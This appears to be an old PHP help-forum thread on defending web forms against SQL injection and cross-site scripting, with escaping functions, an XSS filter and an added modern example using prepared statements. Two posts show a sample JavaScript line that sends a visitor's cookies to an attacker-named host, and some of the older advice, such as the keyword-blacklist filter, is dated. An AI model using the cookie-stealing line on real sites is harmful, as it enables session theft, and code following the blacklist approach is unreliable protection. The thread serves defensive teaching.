Security PHP & Forms


7 replies to this topic

#1 Mutley

Mutley
  • Members
  • PipPipPip
  • Advanced Member
  • 765 posts

Posted 09 October 2006 - 05:57 PM

Is there any tips you can give about securing PHP and forms? I think with forms it is possible at times to do SQL injections, how can you prevent this and stop abuse with forms?

Maybe restrict characters used, I would like to know how to secure the scripts I create.
~ Mutley.

#2 Daniel0

Daniel0
  • Staff Alumni
  • Advanced Member
  • 11,956 posts

Posted 09 October 2006 - 05:59 PM

mysql_real_escape_string would prevent SQL injection. Another thing you need to be wary about is XSS (cross-site scripting) attacks.

#3 Mutley

Mutley
  • Members
  • PipPipPip
  • Advanced Member
  • 765 posts

Posted 09 October 2006 - 06:19 PM

I just looked up mysql_real_escape_string in the PHP manual, so I can just use it among my variables within form fields. Looks easy and useful, I guess it disables certain characters or character combinations to be used.

Not heard of XSS, is it common?
~ Mutley.

#4 Orio

Orio
  • Staff Alumni
  • Advanced Member
  • 2,491 posts

Posted 09 October 2006 - 06:29 PM

I just looked up mysql_real_escape_string in the PHP manual, so I can just use it among my variables within form fields. Looks easy and useful, I guess it disables certain characters or character combinations to be used.



More or less yes :)
But you need to make sure that magic_quotes is turned off, because then the string will be escaped twice. And because mysql_real_escape_string() has a better effect compared to magic_quotes, it's important to use stripslashes() before escaping (if magic_quotes is on).
I use this function to escape my strings:

<?php

// Escapes a value for use inside a quoted SQL string literal.
// Needs an open mysql_connect() link, because mysql_real_escape_string()
// escapes according to the connection's character set.
function sql_quote($value)
{
    // magic_quotes_gpc has already added backslashes to GET/POST/COOKIE
    // data; strip them so the value is not escaped twice.
    if (get_magic_quotes_gpc())
        $value = stripslashes($value);

    // Prefer the connection-aware escape; fall back to addslashes()
    // only when the MySQL extension is not available.
    if (function_exists("mysql_real_escape_string"))
        $value = mysql_real_escape_string($value);
    else
        $value = addslashes($value);

    return $value;
}

?>

Orio.
Think you're smarty?

(Gone until 20 to November)

#5 Daniel0

Daniel0
  • Staff Alumni
  • Advanced Member
  • 11,956 posts

Posted 09 October 2006 - 06:34 PM

Not heard of XSS, is it common?


Yeah, it's beginning to get quite common. It works like this:
1. User gets redirected to the hacker's page. Could be like this (javascript):
location.href='http://evil-hackers-site.com/harvest_cookies.php?data='+document.cookie;
2. The page harvests the cookie information
3. The user is redirected back to the original page.

Here is some information about XSS:
http://ha.ckers.org/xss.html
http://en.wikipedia...._site_scripting

#6 pedrobcabral

pedrobcabral
  • Members
  • PipPipPip
  • Advanced Member
  • 108 posts

Posted 09 October 2006 - 06:45 PM

Is that also prevented with the command spoken above?
If the website does not use cookies then it is impossible to gather information from the user that goes to the site, right?

Isn't the stripslashes enough?
Sorry if I got it wrong,

#7 Daniel0

Daniel0
  • Staff Alumni
  • Advanced Member
  • 11,956 posts

Posted 09 October 2006 - 06:49 PM

Is that also prevented with the command spoken above?


No. For that you would have to do something like this:
// $t holds the untrusted text, to be run through this before it is echoed into HTML.
$t = html_entity_decode($t,ENT_QUOTES);                // undo any entity encoding in the input first
$t = str_replace("<","&#60;",$t);                      // neutralise tag delimiters
$t = str_replace(">","&#62;",$t);
$t = str_replace("&quot;",htmlspecialchars('"'),$t);   // keep double quotes as entities
$t = preg_replace("/&#0*([0-9]*);?/",'&#\\1;',$t);     // normalise numeric entities (drop leading zeros, add the ;)
$t = str_replace('&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;','javascript:',$t); // decode entity-encoded "javascript:"
$t = preg_replace("/javascript:/i","nojava"/*&#97;v&#97;*/."script:",$t);   // then break the scheme so it cannot run
$t = preg_replace("/vbscript:/i","novb"/*&#98;*/."script:",$t);

More info on XSS prevention: http://blog.bitflux..../XSS_Prevention
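The two controls this thread circles around, done the way current PHP does them, as an added example that is not code from any poster: values are bound to the SQL statement instead of being escaped into it (so the magic_quotes double-escaping problem in #4 disappears, and note that magic_quotes and the mysql_* extension no longer exist in modern PHP), and untrusted text is entity-encoded at output time instead of being run through the keyword blacklist in #7. It assumes PDO with an in-memory SQLite database so it runs offline (swap the DSN for MySQL) and a hypothetical `comments` table.

```php
<?php
// Added example (not code from the thread). SQLite in memory is used so it
// runs offline; for MySQL swap the DSN for something like
// 'mysql:host=...;dbname=...;charset=utf8mb4' plus credentials.

// 1. SQL injection. Bind the value instead of escaping it into the SQL text.
//    The value is sent separately from the statement, so quotes, backslashes
//    and magic_quotes double-escaping never reach the SQL parser.
function save_comment(PDO $db, string $author, string $body): int
{
    $stmt = $db->prepare('INSERT INTO comments (author, body) VALUES (:author, :body)');
    $stmt->execute([':author' => $author, ':body' => $body]);
    return (int) $db->lastInsertId();
}

function find_by_author(PDO $db, string $author): array
{
    $stmt = $db->prepare('SELECT author, body FROM comments WHERE author = ?');
    $stmt->execute([$author]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// 2. XSS. Encode at output time for the HTML context. ENT_QUOTES covers both
//    quote characters, so the result is safe inside attributes as well as text.
//    No "javascript:" blacklist is needed: the markup is never parsed as markup.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_comment(array $row): string
{
    return '<p><b>' . e($row['author']) . '</b>: ' . e($row['body']) . '</p>';
}

$db = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);
$db->exec('CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT, body TEXT)');

// Constructed sample input standing in for $_POST; both values are hostile.
$author = "bob' OR '1'='1";
$body   = '<script>alert(document.cookie)</script>';
save_comment($db, $author, $body);
// The WHERE clause compares against the literal string; no other rows match,
// and the stored tag is shown as text rather than executed.
foreach (find_by_author($db, $author) as $row) {
    echo render_comment($row), "\n";
}
```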

#8 tomfmason

tomfmason
  • Staff Alumni
  • Advanced Member
  • 1,696 posts
  • Location: stealing your wifi

Posted 09 October 2006 - 06:55 PM

Not heard of XSS, is it common?


Yeah, it's beginning to get quite common. It works like this:
1. User gets redirected to the hacker's page. Could be like this (javascript):
location.href='http://evil-hackers-site.com/harvest_cookies.php?data='+document.cookie;
2. The page harvests the cookie information
3. The user is redirected back to the original page.

Here is some information about XSS:
http://ha.ckers.org/xss.html
http://en.wikipedia...._site_scripting


Very nice Daniel0..

Here is an article from Developer Fusion on SQL injection.

Good luck,
Tom

Traveling East in search of instruction, and West to propagate the knowledge I have gained.

current projects: pokersource

My Blog | My Pastebin | PHP Validation class | Backtrack linux
